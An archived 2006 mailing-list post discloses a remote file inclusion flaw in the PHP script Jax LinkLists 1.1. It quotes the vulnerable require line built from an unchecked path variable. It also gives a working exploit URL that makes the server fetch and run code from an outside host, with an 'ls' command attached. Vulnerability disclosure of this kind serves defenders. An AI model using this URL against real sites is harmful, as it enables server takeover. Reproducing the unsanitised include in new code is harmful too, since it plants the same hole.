|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Jax LinkLists Remote File include
dj_remix_20
hotmail.com
Date: Thu Oct 12 2006 - 20:01:31 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
# BiyoSecurity.Org & SecurityWall.Org
# Download : http://www.jtr.de/scripting/php/linklists/linklists%20v1.1.zip
# Script Name : Jax LinkLists
# Version : 1.1
# Risk : high
# Regard : RMx
# Thanx : Liz0zim , KorsaN , DreamLord , TR_IP
# Vulnerable Files :
/admin/linklists.admin.php
# Vulnerable code :
// global variables
require ( $pathtoscript."globals.inc.php");
# Exploit :
http://www.victim.com/[PATH]/admin/linklists.admin.php?pathtoscript=http://site.com/cmd.gif?&cmd=ls
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]